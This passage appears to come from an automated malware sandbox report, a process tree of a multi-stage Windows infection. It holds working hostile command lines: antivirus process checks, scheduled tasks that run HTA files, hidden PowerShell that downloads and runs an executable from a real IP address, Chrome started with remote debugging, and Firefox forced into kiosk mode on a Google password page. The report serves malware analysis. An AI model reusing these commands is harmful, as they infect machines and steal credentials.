                                                              • Enumerates processes with tasklist
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1608
                                                            • C:\Windows\SysWOW64\findstr.exe
                                                              findstr /I "opssvc wrsa"
                                                              8⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2472
                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                              tasklist
                                                              8⤵
                                                              • Enumerates processes with tasklist
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2744
                                                            • C:\Windows\SysWOW64\findstr.exe
                                                              findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                              8⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2292
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /c md 418377
                                                              8⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1684
                                                            • C:\Windows\SysWOW64\extrac32.exe
                                                              extrac32 /Y /E Leon.cab
                                                              8⤵
                                                                PID:2420
                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                findstr /V "BEVERAGES" Compilation
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:636
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2076
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                                8⤵
                                                                  PID:1700
                                                                • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                                  Passwords.com N
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  • Suspicious use of SendNotifyMessage
                                                                  PID:1328
                                                                • C:\Windows\SysWOW64\choice.exe
                                                                  choice /d y /t 5
                                                                  8⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2524
                                                            • C:\Users\Admin\AppData\Local\Temp\10352720101\TbV75ZR.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10352720101\TbV75ZR.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Drops file in Windows directory
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1832
                                                              • C:\Windows\SysWOW64\CMD.exe
                                                                "C:\Windows\system32\CMD.exe" /c copy Minneapolis.mid Minneapolis.mid.bat & Minneapolis.mid.bat
                                                                7⤵
                                                                  PID:1596
                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                    tasklist
                                                                    8⤵
                                                                    • Enumerates processes with tasklist
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:888
                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                    findstr /I "opssvc wrsa"
                                                                    8⤵
                                                                      PID:828
                                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                                      tasklist
                                                                      8⤵
                                                                      • Enumerates processes with tasklist
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:912
                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                      8⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1940
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c md 163531
                                                                      8⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:636
                                                                    • C:\Windows\SysWOW64\extrac32.exe
                                                                      extrac32 /Y /E Uses.mid
                                                                      8⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2388
                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                      findstr /V "Hose" Pizza
                                                                      8⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2568
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c copy /b 163531\Hotel.com + Dive + Enjoying + Spray + Expects + Valid + Remainder + Abc + Promoted + Amanda + Auction + Quoted 163531\Hotel.com
                                                                      8⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2648
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c copy /b ..\Revenge.mid + ..\Involves.mid + ..\Delta.mid + ..\Admission.mid K
                                                                      8⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2728
                                                                    • C:\Users\Admin\AppData\Local\Temp\163531\Hotel.com
                                                                      Hotel.com K
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Checks processor information in registry
                                                                      • Modifies system certificate store
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:1296
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                        9⤵
                                                                        • Uses browser remote debugging
                                                                        • Enumerates system info in registry
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:2072
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4b89758,0x7fef4b89768,0x7fef4b89778
                                                                          10⤵
                                                                            PID:2612
                                                                          • C:\Windows\system32\ctfmon.exe
                                                                            ctfmon.exe
                                                                            10⤵
                                                                              PID:2724
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1240,i,4182734944509103741,39395318566489940,131072 /prefetch:2
                                                                              10⤵
                                                                                PID:352
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1240,i,4182734944509103741,39395318566489940,131072 /prefetch:8
                                                                                10⤵
                                                                                  PID:2076
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1612 --field-trial-handle=1240,i,4182734944509103741,39395318566489940,131072 /prefetch:8
                                                                                  10⤵
                                                                                    PID:2716
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2060 --field-trial-handle=1240,i,4182734944509103741,39395318566489940,131072 /prefetch:1
                                                                                    10⤵
                                                                                    • Uses browser remote debugging
                                                                                    PID:1736
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2172 --field-trial-handle=1240,i,4182734944509103741,39395318566489940,131072 /prefetch:1
                                                                                    10⤵
                                                                                    • Uses browser remote debugging
                                                                                    PID:2220
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1332 --field-trial-handle=1240,i,4182734944509103741,39395318566489940,131072 /prefetch:2
                                                                                    10⤵
                                                                                      PID:3236
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1400 --field-trial-handle=1240,i,4182734944509103741,39395318566489940,131072 /prefetch:1
                                                                                      10⤵
                                                                                      • Uses browser remote debugging
                                                                                      PID:3328
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1328 --field-trial-handle=1240,i,4182734944509103741,39395318566489940,131072 /prefetch:8
                                                                                      10⤵
                                                                                        PID:3420
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3664 --field-trial-handle=1240,i,4182734944509103741,39395318566489940,131072 /prefetch:8
                                                                                        10⤵
                                                                                          PID:3436
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3588 --field-trial-handle=1240,i,4182734944509103741,39395318566489940,131072 /prefetch:8
                                                                                          10⤵
                                                                                            PID:3756
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\iec26" & exit
                                                                                          9⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:272
                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                            timeout /t 11
                                                                                            10⤵
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:4012
                                                                                      • C:\Windows\SysWOW64\choice.exe
                                                                                        choice /d y /t 5
                                                                                        8⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1516
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10352730101\q4jfn3p.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10352730101\q4jfn3p.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2380
                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                      C:\Windows\system32\WerFault.exe -u -p 2380 -s 36
                                                                                      7⤵
                                                                                        PID:1308
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10352740101\65f093fbbf.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10352740101\65f093fbbf.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:2072
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c schtasks /create /tn GUbkNmaqs4m /tr "mshta C:\Users\Admin\AppData\Local\Temp\4hAJuGxhY.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                        7⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2188
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /create /tn GUbkNmaqs4m /tr "mshta C:\Users\Admin\AppData\Local\Temp\4hAJuGxhY.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                          8⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:1620
                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                        mshta C:\Users\Admin\AppData\Local\Temp\4hAJuGxhY.hta
                                                                                        7⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Modifies Internet Explorer settings
                                                                                        PID:2320
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZNSAK02ZF61S8MLYEFTY2UDEVHLM7D50.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                          8⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Downloads MZ/PE file
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1108
                                                                                          • C:\Users\Admin\AppData\Local\TempZNSAK02ZF61S8MLYEFTY2UDEVHLM7D50.EXE
                                                                                            "C:\Users\Admin\AppData\Local\TempZNSAK02ZF61S8MLYEFTY2UDEVHLM7D50.EXE"
                                                                                            9⤵
                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                            • Checks BIOS information in registry
                                                                                            • Executes dropped EXE
                                                                                            • Identifies Wine through registry keys
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:872
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\10352750121\am_no.cmd" "
                                                                                      6⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1488
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /t 2
                                                                                        7⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:984
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                        7⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2152
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                          8⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1572
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                        7⤵
                                                                                          PID:2612
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                            8⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2608
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                          7⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2480
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                            8⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2760
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /create /tn "SOlygma097Z" /tr "mshta \"C:\Temp\kmEi73MoF.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                                                          7⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:672
                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                          mshta "C:\Temp\kmEi73MoF.hta"
                                                                                          7⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Modifies Internet Explorer settings
                                                                                          PID:1076
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                            8⤵
                                                                                            • Blocklisted process makes network request
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Downloads MZ/PE file
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1520
                                                                                            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                              9⤵
                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                              • Checks BIOS information in registry
                                                                                              • Executes dropped EXE
                                                                                              • Identifies Wine through registry keys
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:2500
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10352760101\5bd9c73f65.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10352760101\5bd9c73f65.exe"
                                                                                        6⤵
                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                        • Checks BIOS information in registry
                                                                                        • Executes dropped EXE
                                                                                        • Identifies Wine through registry keys
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:3568
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10352770101\2844ba2ad2.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10352770101\2844ba2ad2.exe"
                                                                                        6⤵
                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                        • Downloads MZ/PE file
                                                                                        • Checks BIOS information in registry
                                                                                        • Executes dropped EXE
                                                                                        • Identifies Wine through registry keys
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        • Checks processor information in registry
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:3104
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                          7⤵
                                                                                          • Uses browser remote debugging
                                                                                          • Enumerates system info in registry
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:984
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4ae9758,0x7fef4ae9768,0x7fef4ae9778
                                                                                            8⤵
                                                                                              PID:1636
                                                                                            • C:\Windows\system32\ctfmon.exe
                                                                                              ctfmon.exe
                                                                                              8⤵
                                                                                                PID:3272
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1288,i,9055402133811605994,3509302721557042183,131072 /prefetch:2
                                                                                                8⤵
                                                                                                  PID:3280
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1288,i,9055402133811605994,3509302721557042183,131072 /prefetch:8
                                                                                                  8⤵
                                                                                                    PID:3316
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 --field-trial-handle=1288,i,9055402133811605994,3509302721557042183,131072 /prefetch:8
                                                                                                    8⤵
                                                                                                      PID:3620
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1984 --field-trial-handle=1288,i,9055402133811605994,3509302721557042183,131072 /prefetch:1
                                                                                                      8⤵
                                                                                                      • Uses browser remote debugging
                                                                                                      PID:3632
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2624 --field-trial-handle=1288,i,9055402133811605994,3509302721557042183,131072 /prefetch:1
                                                                                                      8⤵
                                                                                                      • Uses browser remote debugging
                                                                                                      PID:2272
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2660 --field-trial-handle=1288,i,9055402133811605994,3509302721557042183,131072 /prefetch:1
                                                                                                      8⤵
                                                                                                      • Uses browser remote debugging
                                                                                                      PID:1588
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1456 --field-trial-handle=1288,i,9055402133811605994,3509302721557042183,131072 /prefetch:2
                                                                                                      8⤵
                                                                                                        PID:3800
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10352780101\f6d60022ff.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10352780101\f6d60022ff.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                    PID:2768
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /F /IM firefox.exe /T
                                                                                                      7⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Kills process with taskkill
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4012
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /F /IM chrome.exe /T
                                                                                                      7⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Kills process with taskkill
                                                                                                      PID:1392
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /F /IM msedge.exe /T
                                                                                                      7⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Kills process with taskkill
                                                                                                      PID:2368
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /F /IM opera.exe /T
                                                                                                      7⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Kills process with taskkill
                                                                                                      PID:3496
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /F /IM brave.exe /T
                                                                                                      7⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Kills process with taskkill
                                                                                                      PID:3556
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                      7⤵
                                                                                                        PID:2616
                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                          8⤵
                                                                                                          • Checks processor information in registry
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                          PID:2792
                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2792.0.1032786509\1672349597" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1172 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e76e1579-9b87-49c6-8050-790ce89fffdd} 2792 "\\.\pipe\gecko-crash-server-pipe.2792" 1276 f1d6a58 gpu
                                                                                                            9⤵
                                                                                                              PID:3500
                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2792.1.1904043140\753725694" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {32ca1184-e7bf-455d-a45d-99563f8cb9d4} 2792 "\\.\pipe\gecko-crash-server-pipe.2792" 1504 d71558 socket
                                                                                                              9⤵
                                                                                                                PID:480
                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
